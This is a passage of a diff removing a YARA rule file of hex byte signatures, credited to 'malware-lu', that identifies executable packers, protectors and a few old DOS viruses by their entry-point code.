-		$a0 at pe.entry_point
-}
-	
-	
-rule Anti007V26LiuXingPing
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 56 69 72 74 75 61 6C 50 72 6F 74 65 63 74 00 00 00 56 69 72 74 75 61 6C 41 6C 6C 6F 63 00 00 00 56 69 72 74 75 61 6C 46 72 65 65 00 00 00 47 65 74 53 79 73 74 65 6D 44 69 72 65 63 74 6F 72 79 41 00 00 00 43 72 65 61 74 65 46 69 6C 65 41 00 00 00 57 72 69 74 65 46 69 6C 65 00 00 00 43 6C 6F 73 65 48 61 6E 64 6C 65 00 00 00 45 78 69 74 50 72 6F 63 65 73 73 00 00 }
-
-condition:
-		$a0
-}
-	
-	
-rule AppEncryptorSilentTeam
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 00 00 00 00 5D 81 ED 1F 1F 40 00 B9 7B 09 00 00 8D BD 67 1F 40 00 8B F7 AC }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule VirogenCryptv075
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 9C 55 E8 EC 00 00 00 87 D5 5D 60 87 D5 80 BD 15 27 40 00 01 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Armadillov300a
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 ?? ?? ?? ?? 5D 50 51 EB 0F B9 EB 0F B8 EB 07 B9 EB 0F 90 EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC E9 59 58 50 51 EB }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule WWPACKv300v301Extractable
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { B8 ?? ?? 8C CA 03 D0 8C C9 81 C1 ?? ?? 51 6A ?? 06 06 8C D3 83 ?? ?? 53 6A ?? FC }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule VxUddy2617
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 2E ?? ?? ?? ?? ?? 2E ?? ?? ?? ?? ?? 2E ?? ?? ?? 8C C8 8E D8 8C ?? ?? ?? 2B ?? ?? ?? 03 ?? ?? ?? A3 ?? ?? A1 ?? ?? A3 ?? ?? A1 ?? ?? A3 ?? ?? 8C C8 2B ?? ?? ?? 03 ?? ?? ?? A3 ?? ?? B8 AB 9C CD 2F 3D 76 98 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PLINK8619841985
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { FA 8C C7 8C D6 8B CC BA ?? ?? 8E C2 26 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ASPackv10804AlexeySolodovnikov
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 41 06 00 00 EB 41 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule aPackv098m
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 1E 06 8C C8 8E D8 05 ?? ?? 8E C0 50 BE ?? ?? 33 FF FC B2 ?? BD ?? ?? 33 C9 50 A4 BB ?? ?? 3B F3 76 }
-
-condition:
-		$a0
-}
-	
-	
-rule BamBamv001Bedrock
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 6A 14 E8 9A 05 00 00 8B D8 53 68 FB ?? ?? 00 E8 6C FD FF FF B9 05 00 00 00 8B F3 BF FB ?? ?? 00 53 F3 A5 E8 8D 05 00 00 8B 3D 03 ?? ?? 00 A1 2B ?? ?? 00 66 8B 15 2F ?? ?? 00 B9 80 ?? ?? 00 2B CF 89 45 E8 89 0D 6B ?? ?? 00 66 89 55 EC 8B 41 3C 33 D2 03 C1 }
-
-condition:
-		$a0
-}
-	
-	
-rule PESHiELDv02v02bv02b2
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 ?? ?? ?? ?? 41 4E 41 4B 49 4E 5D 83 ED 06 EB 02 EA 04 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule EXEStealthv27
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 00 60 EB 00 E8 00 00 00 00 5D 81 ED D3 26 40 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule EXEStealthv25
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 90 EB 22 45 78 65 53 74 65 61 6C 74 68 20 2D 20 77 77 77 2E 77 65 62 74 6F 6F 6C 6D 61 73 74 65 72 2E 63 6F 6D E8 00 00 00 00 5D 81 ED 40 1E 40 00 B9 99 09 00 00 8D BD 88 1E 40 00 8B F7 AC }
-
-condition:
-		$a0
-}
-	
-	
-rule VxHaryanto
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 81 EB 2A 01 8B 0F 1E 5B 03 CB 0E 51 B9 10 01 51 CB }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ASPRStripperv2xunpacked
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { BB ?? ?? ?? ?? E9 ?? ?? ?? ?? 60 9C FC BF ?? ?? ?? ?? B9 ?? ?? ?? ?? F3 AA 9D 61 C3 55 8B EC }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PseudoSigner01UPX06Anorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 00 00 00 FF 57 8D B0 E8 00 00 00 E9 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Shrinker33
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 00 00 55 8B EC 56 57 75 65 68 00 01 00 00 E8 }
-
-condition:
-		$a0
-}
-	
-	
-rule Shrinker32
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 56 57 75 65 68 00 01 00 00 E8 F1 E6 FF FF 83 C4 04 }
-
-condition:
-		$a0
-}
-	
-	
-rule Shrinker34
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 56 57 75 6B 68 00 01 00 00 E8 11 0B 00 00 83 C4 04 }
-
-condition:
-		$a0
-}
-	
-	
-rule PESPinv13Cyberbob
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 AC DF 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PECompactv160v165
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 3F 80 40 ?? 87 DD 8B 85 D2 80 40 ?? 01 85 33 80 40 ?? 66 C7 85 ?? 80 40 ?? 90 90 01 85 CE 80 40 ?? BB BB 12 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule eXPressorv120b
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 81 EC D4 01 00 00 53 56 57 EB 0C 45 78 50 72 2D 76 2E 31 2E 32 2E 2E B8 ?? ?? ?? 00 2B 05 84 ?? ?? 00 A3 ?? ?? ?? 00 83 3D ?? ?? ?? 00 00 74 16 A1 ?? ?? ?? 00 03 05 80 ?? ?? 00 89 85 54 FE FF FF E9 ?? 07 00 00 C7 05 ?? ?? ?? 00 01 00 00 00 68 04 }
-
-condition:
-		$a0
-}
-	
-	
-rule EPWv12
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 06 57 1E 56 55 52 51 53 50 2E ?? ?? ?? ?? 8C C0 05 ?? ?? 2E ?? ?? ?? 8E D8 A1 ?? ?? 2E }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ASProtectv12x
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 00 00 68 01 ?? ?? ?? C3 AA }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Packanoidv1Arkanoid
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { BF ?? ?? ?? ?? BE ?? ?? ?? ?? E8 9D 00 00 00 B8 ?? ?? ?? ?? 8B 30 8B 78 04 BB ?? ?? ?? ?? 8B 43 04 91 E3 1F 51 FF D6 56 96 8B 13 8B 02 91 E3 0D 52 51 56 FF D7 5A 89 02 83 C2 04 EB EE 83 C3 08 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule EscargotV01Meat
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 04 40 30 2E 31 60 68 61 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule SCObfuscatorSuperCRacker
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 33 C9 8B 1D 00 ?? ?? ?? 03 1D 08 ?? ?? ?? 8A 04 19 84 C0 74 09 3C ?? 74 05 34 ?? 88 04 19 41 3B 0D 04 ?? ?? ?? 75 E7 A1 08 ?? ?? ?? 01 05 0C ?? ?? ?? 61 FF 25 0C }
-
-condition:
-		$a0
-}
-	
-	
-rule EXEStealth275WebtoolMaster
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 90 60 90 E8 00 00 00 00 5D 81 ED D1 27 40 00 B9 15 00 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PasswordProtectorcMiniSoft1992
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 06 0E 0E 07 1F E8 00 00 5B 83 EB 08 BA 27 01 03 D3 E8 3C 02 BA EA }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule VxEddie2000
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 ?? ?? 5E 81 EE ?? ?? FC 2E ?? ?? ?? ?? 2E ?? ?? ?? ?? 4D 5A ?? ?? FA 8B E6 81 C4 ?? ?? FB 3B ?? ?? ?? ?? ?? 50 06 56 1E 8B FE 33 C0 50 8E D8 C5 ?? ?? ?? B4 30 CD 21 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule VideoLanClientUnknownCompiler
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 89 E5 83 EC 08 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? FF FF ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule eXPressorv14CGSoftLabs
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 83 EC ?? 53 56 57 EB 0C 45 78 50 72 2D 76 2E 31 2E 34 2E 2E B8 }
-	$a1 = { 65 58 50 72 2D 76 2E 31 2E 34 2E }
-
-condition:
-		$a0 at pe.entry_point or $a1
-}
-	
-	
-rule SkDUndetectablerPro20NoUPXMethodSkD
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 83 C4 F0 B8 FC 26 00 10 E8 EC F3 FF FF 6A 0F E8 15 F5 FF FF E8 64 FD FF FF E8 BB ED FF FF 8D 40 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule RJcrushv100
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 06 FC 8C C8 BA ?? ?? 03 D0 52 BA ?? ?? 52 BA ?? ?? 03 C2 8B D8 05 ?? ?? 8E DB 8E C0 33 F6 33 FF B9 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ExeShieldv27
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 06 68 F4 86 06 00 C3 9C 60 E8 02 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ExeShieldv29
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 00 00 00 00 5D 81 ED 0B 20 40 00 B9 EB 08 00 00 8D BD 53 20 40 00 8B F7 AC ?? ?? ?? F8 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PEiDBundlev102v103BoBBobSoft
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 9C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 ?? ?? ?? 2E ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 80 00 00 00 00 4B 65 72 6E 65 6C 33 32 2E 44 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule FSGv110EngdulekxtMicrosoftVisualC5060
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 33 D2 0F BE D2 EB 01 C7 EB 01 D8 8D 05 80 ?? ?? ?? EB 02 CD 20 EB 01 F8 BE F4 00 00 00 EB }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PUNiSHERV15FEUERRADER
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 3F 00 00 80 66 20 ?? 00 7E 20 ?? 00 92 20 ?? 00 A4 20 ?? 00 00 00 00 00 4B 45 52 4E 45 4C 33 32 }
-
-condition:
-		$a0
-}
-	
-	
-rule ExcaliburV103forgot
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E9 00 00 00 00 60 E8 14 00 00 00 5D 81 ED 00 00 00 00 6A 45 E8 A3 00 00 00 68 00 00 00 00 E8 58 61 EB 39 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule RLPack10betaap0x
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 00 00 00 00 8D 64 24 04 8B 6C 24 FC 8D B5 4C 02 00 00 8D 9D 13 01 00 00 33 FF EB 0F FF 74 37 04 FF 34 37 FF D3 83 C4 08 83 C7 08 83 3C 37 00 75 EB 8D 74 37 04 53 6A 40 68 00 10 00 00 68 ?? ?? ?? ?? 6A 00 FF 95 F9 01 00 00 89 85 48 02 00 00 5B FF B5 }
-	$a1 = { 60 E8 00 00 00 00 8D 64 24 04 8B 6C 24 FC 8D B5 4C 02 00 00 8D 9D 13 01 00 00 33 FF EB 0F FF 74 37 04 FF 34 37 FF D3 83 C4 08 83 C7 08 83 3C 37 00 75 EB 8D 74 37 04 53 6A 40 68 00 10 00 00 68 ?? ?? ?? ?? 6A 00 FF 95 F9 01 00 00 89 85 48 02 00 00 5B FF B5 48 02 00 00 56 FF D3 83 C4 08 8B B5 48 02 00 00 8B C6 EB 01 40 80 38 01 75 FA 40 8B 38 83 C0 04 89 85 44 02 00 00 EB 7A 56 FF 95 F1 01 00 00 89 85 40 02 00 00 8B C6 EB 4F 8B 85 44 02 00 00 8B 00 A9 00 00 00 80 74 14 35 00 00 00 80 50 8B 85 44 02 00 00 C7 00 20 20 20 00 EB 06 FF B5 44 02 00 00 FF B5 40 02 00 00 FF 95 F5 01 00 00 89 07 83 C7 04 8B 85 44 02 00 00 EB 01 40 80 38 00 75 FA 40 89 85 44 02 00 00 80 38 00 75 AC EB 01 46 80 3E 00 75 FA 46 40 8B 38 83 C0 04 89 85 44 02 00 00 80 3E 01 75 81 68 00 40 00 00 68 ?? ?? ?? ?? FF B5 48 02 00 00 FF 95 FD 01 00 00 61 68 ?? ?? ?? ?? C3 60 8B 74 24 24 8B 7C }
-
-condition:
-		$a0 at pe.entry_point or $a1 at pe.entry_point
-}
-	
-	
-rule nMacrorecorder10
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 5C 6E 6D 72 5F 74 65 6D 70 2E 6E 6D 72 00 00 00 72 62 00 00 58 C7 41 00 10 F8 41 00 11 01 00 00 00 00 00 00 46 E1 00 00 46 E1 00 00 35 00 00 00 F6 88 41 00 }
-
-condition:
-		$a0
-}
-	
-	
-rule PrivateEXEv20a
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 53 E8 00 00 00 00 5B 8B C3 2D }
-	$a1 = { 06 60 C8 ?? ?? ?? 0E 68 ?? ?? 9A ?? ?? ?? ?? 3D ?? ?? 0F ?? ?? ?? 50 50 0E 68 ?? ?? 9A ?? ?? ?? ?? 0E }
-	$a2 = { 53 E8 ?? ?? ?? ?? 5B 8B C3 2D ?? ?? ?? ?? 50 81 ?? ?? ?? ?? ?? 8B }
-
-condition:
-		$a0 at pe.entry_point or $a1 at pe.entry_point or $a2 at pe.entry_point
-}
-	
-	
-rule PackmanV10BrandonLaCombe
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 00 00 00 00 5B 8D 5B C6 01 1B 8B 13 8D 73 14 6A 08 59 01 16 AD 49 75 FA }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PseudoSigner01PEX099Anorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 01 00 00 00 55 83 C4 04 E8 01 00 00 00 90 5D 81 FF FF FF 00 01 E9 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PAKSFXArchive
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 83 ?? ?? A1 ?? ?? 2E ?? ?? ?? 2E ?? ?? ?? ?? ?? 8C D7 8E C7 8D ?? ?? BE ?? ?? FC AC 3C 0D }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ASPackv2xxAlexeySolodovnikov
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { A8 03 00 00 61 75 08 B8 01 00 00 00 C2 0C 00 68 00 00 00 00 C3 8B 85 26 04 00 00 8D 8D 3B 04 00 00 51 50 FF 95 }
-	$a1 = { A8 03 ?? ?? 61 75 08 B8 01 ?? ?? ?? C2 0C ?? 68 ?? ?? ?? ?? C3 8B 85 26 04 ?? ?? 8D 8D 3B 04 ?? ?? 51 50 FF 95 }
-
-condition:
-		$a0 at pe.entry_point or $a1 at pe.entry_point
-}
-	
-	
-rule SimbiOZ13Extranger
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 57 57 8D 7C 24 04 50 B8 00 ?? ?? ?? AB 58 5F C3 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule muckisprotectorImucki
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { BE ?? ?? ?? ?? B9 ?? ?? ?? ?? 8A 06 F6 D0 88 06 46 E2 F7 E9 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Obsidium1339ObsidiumSoftware
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 02 ?? ?? E8 29 00 00 00 EB 03 ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 28 EB 02 ?? ?? 33 C0 EB 02 ?? ?? C3 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 01 ?? 50 EB 03 ?? ?? ?? 33 C0 EB 03 ?? ?? ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 04 ?? ?? ?? ?? E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 02 ?? ?? EB 04 ?? ?? ?? ?? 58 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 03 ?? ?? ?? 83 C4 04 EB 04 ?? ?? ?? ?? E8 CF 27 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule LOCK98V10028keenvim
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 E8 00 00 00 00 5D 81 ?? ?? ?? ?? ?? EB 05 E9 ?? ?? ?? ?? EB 08 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule iPBProtectv013
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 6A FF 68 4B 43 55 46 68 54 49 48 53 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 FA 33 DB 89 5D F8 6A 02 EB 01 F8 58 5F 5E 5B 64 8B 25 00 00 00 00 64 8F 05 00 00 00 00 58 58 58 5D 68 9F 6F 56 B6 50 E8 5D 00 00 00 EB FF 71 78 }
-
-condition:
-		$a0
-}
-	
-	
-rule PrivateEXEProtector197SetiSoft
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 83 C4 F4 FC 53 57 56 8B 74 24 20 8B 7C 24 24 66 81 3E 4A 43 0F 85 A5 02 00 00 83 C6 0A 33 DB BA 00 00 00 80 C7 44 24 14 08 00 00 00 43 8D A4 24 00 00 00 00 8B FF 03 D2 75 08 8B 16 83 C6 04 F9 13 D2 73 2C 8B 4C 24 10 33 C0 8D A4 24 00 00 00 00 05 00 00 00 00 03 D2 75 08 8B 16 83 C6 04 F9 13 D2 13 C0 49 75 EF 02 44 24 0C 88 07 47 EB C6 03 D2 75 08 8B 16 83 C6 04 F9 13 D2 0F 82 6E 01 00 00 03 D2 75 08 8B 16 83 C6 04 F9 13 D2 0F 83 DC 00 00 00 B9 04 00 00 00 33 C0 8D A4 24 00 00 00 00 8D 64 24 00 03 D2 75 08 8B 16 83 C6 04 F9 13 D2 13 C0 49 75 EF 48 74 B1 0F 89 EF 01 00 00 03 D2 75 08 8B 16 83 C6 04 F9 13 D2 73 42 BD 00 01 00 00 B9 08 00 00 00 33 C0 8D A4 24 00 00 00 00 05 00 00 00 00 03 D2 75 08 8B 16 83 C6 04 F9 13 D2 13 C0 49 75 EF 88 07 47 4D 75 D6 }
-
-condition:
-		$a0
-}
-	
-	
-rule ASPackv21AlexeySolodovnikov
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 72 05 00 00 EB 33 87 DB 90 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ASPackv103bAlexeySolodovnikov
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 ?? ?? ?? ?? 5D 81 ED AE 98 43 ?? B8 A8 98 43 ?? 03 C5 2B 85 18 9D 43 ?? 89 85 24 9D 43 ?? 80 BD 0E 9D 43 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule FSGv20
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 87 25 ?? ?? ?? ?? 61 94 55 A4 B6 80 FF 13 73 F9 33 C9 FF 13 73 16 33 C0 FF 13 73 1F B6 80 41 B0 10 FF 13 12 C0 73 FA 75 }
-
-condition:
-		$a0
-}
-	
-	
-rule PseudoSigner01PEIntro10Anorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 8B 04 24 9C 60 E8 14 00 00 00 5D 81 ED 0A 45 40 90 80 BD 67 44 40 90 90 0F 85 48 FF ED 0A E9 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule tElockv099SpecialBuildheXerforgot
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E9 5E DF FF FF 00 00 00 ?? ?? ?? ?? E5 ?? ?? 00 00 00 00 00 00 00 00 00 05 ?? ?? 00 F5 ?? ?? 00 ED ?? ?? 00 00 00 00 00 00 00 00 00 12 ?? ?? 00 FD ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1D ?? ?? 00 00 00 00 00 30 ?? ?? 00 00 }
-	$a1 = { E9 5E DF FF FF 00 00 00 ?? ?? ?? ?? E5 ?? ?? 00 00 00 00 00 00 00 00 00 05 ?? ?? 00 F5 ?? ?? 00 ED ?? ?? 00 00 00 00 00 00 00 00 00 12 ?? ?? 00 FD ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1D ?? ?? 00 00 00 00 00 30 ?? ?? 00 00 00 00 00 1D ?? ?? 00 00 00 00 00 30 ?? ?? 00 00 00 00 00 }
-
-condition:
-		$a0 at pe.entry_point or $a1 at pe.entry_point
-}
-	
-	
-rule VxBackfont900
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 ?? ?? B4 30 CD 21 3C 03 ?? ?? B8 ?? ?? BA ?? ?? CD 21 81 FA ?? ?? ?? ?? BA ?? ?? 8C C0 48 8E C0 8E D8 80 ?? ?? ?? 5A ?? ?? 03 ?? ?? ?? 40 8E D8 80 ?? ?? ?? 5A ?? ?? 83 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule CrunchPEv20xx
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 E8 ?? ?? ?? ?? 5D 83 ED 06 8B C5 55 60 89 AD ?? ?? ?? ?? 2B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 55 BB ?? ?? ?? ?? 03 DD 53 64 67 FF 36 ?? ?? 64 67 89 26 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Litev003a
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 06 FC 1E 07 BE ?? ?? ?? ?? 6A 04 68 ?? 10 ?? ?? 68 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule SimplePack1XMethod2bagie
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 4D 5A 90 EB 01 00 52 E9 ?? 01 00 00 50 45 00 00 4C 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 E0 00 0F 03 0B 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0C 00 00 00 00 ?? ?? ?? 00 10 00 00 00 02 00 00 01 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 }
-
-condition:
-		$a0
-}
-	
-	
-rule PEncryptv10
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 9C BE 00 10 40 00 8B FE B9 28 03 00 00 BB 78 56 34 12 AD 33 C3 AB E2 FA 9D 61 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule BJFntv12RC
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 02 69 B1 83 EC 04 EB 03 CD 20 EB EB 01 EB 9C EB 01 EB EB }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule FishPEShield112116HellFish
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 83 C4 D0 53 56 57 8B 45 10 83 C0 0C 8B 00 89 45 DC 83 7D DC 00 75 08 E8 BD FE FF FF 89 45 DC E8 E1 FD FF FF 8B 00 03 45 DC 89 45 E4 E8 DC FE FF FF 8B D8 BA 8E 4E 0E EC 8B C3 E8 2E FF FF FF 89 45 F4 BA 04 49 32 D3 8B C3 E8 1F FF FF FF 89 45 F8 BA 54 CA AF 91 8B C3 E8 10 FF FF FF 89 45 F0 BA AC 33 06 03 8B C3 E8 01 FF FF FF 89 45 EC BA 1B C6 46 79 8B C3 E8 F2 FE FF FF 89 45 E8 BA AA FC 0D 7C 8B C3 E8 E3 FE FF FF 89 45 FC 8B 45 E4 8B 58 04 03 5D E4 8B FB 8B 45 E4 8B 30 4E 85 F6 72 2B }
-	$a1 = { 60 E8 EA FD FF FF FF D0 C3 8D 40 00 ?? 00 00 00 2C 00 00 00 ?? ?? ?? 00 ?? ?? 00 00 ?? ?? ?? 00 00 ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? 00 00 00 00 ?? ?? 00 ?? ?? 00 00 ?? 00 00 00 00 ?? ?? 00 00 10 00 00 ?? ?? ?? 00 40 ?? ?? ?? 00 00 ?? ?? 00 00 ?? ?? 00 ?? ?? ?? 00 40 ?? ?? ?? 00 00 ?? 00 00 00 ?? ?? 00 ?? ?? 00 00 40 }
-
-condition:
-		$a0 or $a1 at pe.entry_point
-}
-	
-	
-rule CodeCryptv016bv0163b
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E9 2E 03 00 00 EB 02 83 3D 58 EB 02 FF 1D 5B EB 02 0F C7 5F }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule VOBProtectCD
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 5F 81 EF ?? ?? ?? ?? BE ?? ?? 40 ?? 8B 87 ?? ?? ?? ?? 03 C6 57 56 8C A7 ?? ?? ?? ?? FF 10 89 87 ?? ?? ?? ?? 5E 5F }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule diProtectorV1XdiProtectorSoftware
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 01 00 A0 E3 14 00 00 EB 00 00 20 E0 44 10 9F E5 03 2A A0 E3 40 30 A0 E3 AE 00 00 EB 30 00 8F E5 00 20 A0 E1 3A 0E 8F E2 00 00 80 E2 1C 10 9F E5 20 30 8F E2 0E 00 00 EB 14 00 9F E5 14 10 9F E5 7F 20 A0 E3 C5 00 00 EB 04 C0 8F E2 00 F0 9C E5 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PrivateexeProtector20SetiSoftTeam
-{
-      meta:
-		author="malware-lu"
-strings:
